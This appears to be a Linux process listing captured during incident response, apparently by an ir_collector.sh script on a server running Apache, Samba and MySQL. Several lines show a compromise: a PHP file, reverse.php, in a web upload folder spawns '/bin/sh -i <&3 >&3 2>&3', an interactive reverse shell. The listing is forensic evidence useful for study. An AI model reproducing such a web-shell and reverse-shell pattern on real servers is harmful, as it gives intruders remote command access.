UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 10:07 ?        00:00:01 /sbin/init
root         2     0  0 10:07 ?        00:00:00 [kthreadd]
root         3     2  0 10:07 ?        00:00:00 [migration/0]
root         4     2  0 10:07 ?        00:00:00 [ksoftirqd/0]
root         5     2  0 10:07 ?        00:00:00 [watchdog/0]
root         6     2  0 10:07 ?        00:00:00 [events/0]
root         7     2  0 10:07 ?        00:00:00 [cpuset]
root         8     2  0 10:07 ?        00:00:00 [khelper]
root         9     2  0 10:07 ?        00:00:00 [netns]
root        10     2  0 10:07 ?        00:00:00 [async/mgr]
root        11     2  0 10:07 ?        00:00:00 [pm]
root        12     2  0 10:07 ?        00:00:00 [sync_supers]
root        13     2  0 10:07 ?        00:00:00 [bdi-default]
root        14     2  0 10:07 ?        00:00:00 [kintegrityd/0]
root        15     2  0 10:07 ?        00:00:00 [kblockd/0]
root        16     2  0 10:07 ?        00:00:00 [kacpid]
root        17     2  0 10:07 ?        00:00:00 [kacpi_notify]
root        18     2  0 10:07 ?        00:00:00 [kacpi_hotplug]
root        19     2  0 10:07 ?        00:00:00 [ata/0]
root        20     2  0 10:07 ?        00:00:00 [ata_aux]
root        21     2  0 10:07 ?        00:00:00 [ksuspend_usbd]
root        22     2  0 10:07 ?        00:00:00 [khubd]
root        23     2  0 10:07 ?        00:00:00 [kseriod]
root        24     2  0 10:07 ?        00:00:00 [kmmcd]
root        27     2  0 10:07 ?        00:00:00 [khungtaskd]
root        28     2  0 10:07 ?        00:00:00 [kswapd0]
root        29     2  0 10:07 ?        00:00:00 [ksmd]
root        30     2  0 10:07 ?        00:00:00 [aio/0]
root        31     2  0 10:07 ?        00:00:00 [ecryptfs-kthrea]
root        32     2  0 10:07 ?        00:00:00 [crypto/0]
root        35     2  0 10:07 ?        00:00:00 [pciehpd]
root        37     2  0 10:07 ?        00:00:00 [scsi_eh_0]
root        38     2  0 10:07 ?        00:00:00 [scsi_eh_1]
root        41     2  0 10:07 ?        00:00:00 [kstriped]
root        42     2  0 10:07 ?        00:00:00 [kmpathd/0]
root        43     2  0 10:07 ?        00:00:00 [kmpath_handlerd]
root        44     2  0 10:07 ?        00:00:00 [ksnapd]
root        45     2  0 10:07 ?        00:00:00 [kondemand/0]
root        46     2  0 10:07 ?        00:00:00 [kconservative/0]
root       134     2  0 10:07 ?        00:00:00 [usbhid_resumer]
root       248     2  0 10:07 ?        00:00:00 [mpt_poll_0]
root       249     2  0 10:07 ?        00:00:00 [mpt/0]
root       250     2  0 10:07 ?        00:00:00 [scsi_eh_2]
root       269     2  0 10:07 ?        00:00:00 [kjournald]
root       300     2  0 10:07 ?        00:00:00 [flush-8:0]
root       329     1  0 10:08 ?        00:00:00 upstart-udev-bridge --daemon
root       331     1  0 10:08 ?        00:00:00 udevd --daemon
root       443   331  0 10:08 ?        00:00:00 udevd --daemon
root       444   331  0 10:08 ?        00:00:00 udevd --daemon
root       524     2  0 10:08 ?        00:00:00 [kpsmoused]
root       541     2  0 10:08 ?        00:00:00 [bluetooth]
root       554     2  0 10:08 ?        00:00:00 [kgameportd]
root       659     1  0 10:08 ?        00:00:00 smbd -F
syslog     669     1  0 10:08 ?        00:00:00 rsyslogd -c4
root       715     1  0 10:08 tty4     00:00:00 /sbin/getty -8 38400 tty4
root       720     1  0 10:08 tty5     00:00:00 /sbin/getty -8 38400 tty5
root       722   659  0 10:08 ?        00:00:00 smbd -F
root       726     1  0 10:08 tty2     00:00:00 /sbin/getty -8 38400 tty2
root       727     1  0 10:08 tty3     00:00:00 /sbin/getty -8 38400 tty3
root       732     1  0 10:08 tty6     00:00:00 /sbin/getty -8 38400 tty6
root       754     1  0 10:08 ?        00:00:00 cron
daemon     755     1  0 10:08 ?        00:00:00 atd
root       756     1  0 10:08 ?        00:00:00 /usr/sbin/winbindd
root       759   756  0 10:08 ?        00:00:00 /usr/sbin/winbindd
mysql      799     1  0 10:08 ?        00:00:00 /usr/sbin/mysqld
root       802     1  0 10:08 ?        00:00:00 /usr/sbin/apache2 -k start
www-data   814   802  0 10:08 ?        00:00:00 /usr/sbin/apache2 -k start
www-data   815   802  0 10:08 ?        00:00:00 /usr/sbin/apache2 -k start
www-data   816   802  0 10:08 ?        00:00:00 /usr/sbin/apache2 -k start
www-data   817   802  0 10:08 ?        00:00:00 /usr/sbin/apache2 -k start
www-data   818   802  0 10:08 ?        00:00:00 /usr/sbin/apache2 -k start
root       839     1  0 10:08 ?        00:00:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp3/dhclient.eth0.leases eth0
root       869     1  0 10:08 tty1     00:00:00 /bin/login --        
root       872     1  0 10:08 ?        00:00:00 /usr/sbin/sshd -D
root       886     1  0 10:08 ?        00:00:00 nmbd -D
root       944   756  0 10:08 ?        00:00:00 /usr/sbin/winbindd
admin01   1013   869  0 10:08 tty1     00:00:00 -bash
root      1033  1013  0 10:08 tty1     00:00:01 su
root      1034  1033  0 10:09 tty1     00:00:00 bash
root      1054   872  0 10:09 ?        00:00:00 sshd: dev [priv]    
dev       1123  1054  0 10:09 ?        00:00:00 sshd: dev@notty     
dev       1124  1123  0 10:09 ?        00:00:00 /usr/lib/openssh/sftp-server
root      1150   872  0 10:10 ?        00:00:00 sshd: dev [priv]    
dev       5226  1150  0 10:11 ?        00:00:00 sshd: dev@pts/0     
dev       5227  5226  0 10:11 pts/0    00:00:00 -bash
www-data  5244   814  0 10:11 ?        00:00:00 sh -c php -f /var/www/upload/editor/image/reverse.php
www-data  5245  5244  0 10:11 ?        00:00:00 php -f /var/www/upload/editor/image/reverse.php
www-data  5247  5245  0 10:11 ?        00:00:00 sh -c /bin/sh -i <&3 >&3 2>&3
www-data  5248  5247  0 10:11 ?        00:00:00 /bin/sh -i
www-data  5249   802  0 10:11 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  5250   802  0 10:11 ?        00:00:00 /usr/sbin/apache2 -k start
root      5251   872  0 10:14 ?        00:00:00 sshd: ahnlab [priv] 
ahnlab    5325  5251  0 10:14 ?        00:00:00 sshd: ahnlab@notty  
ahnlab    5326  5325  0 10:14 ?        00:00:00 /usr/lib/openssh/sftp-server
root      5327   872  0 10:14 ?        00:00:00 sshd: ahnlab [priv] 
ahnlab    5400  5327  0 10:14 ?        00:00:00 sshd: ahnlab@pts/1  
ahnlab    5401  5400  0 10:14 pts/1    00:00:00 -bash
root      5419  5401  0 10:14 pts/1    00:00:00 su
root      5420  5419  0 10:15 pts/1    00:00:00 bash
root      5431  5420  0 10:15 pts/1    00:00:00 /bin/sh ./ir_collector.sh
root      5458  5431  0 10:16 pts/1    00:00:00 ps -eaf
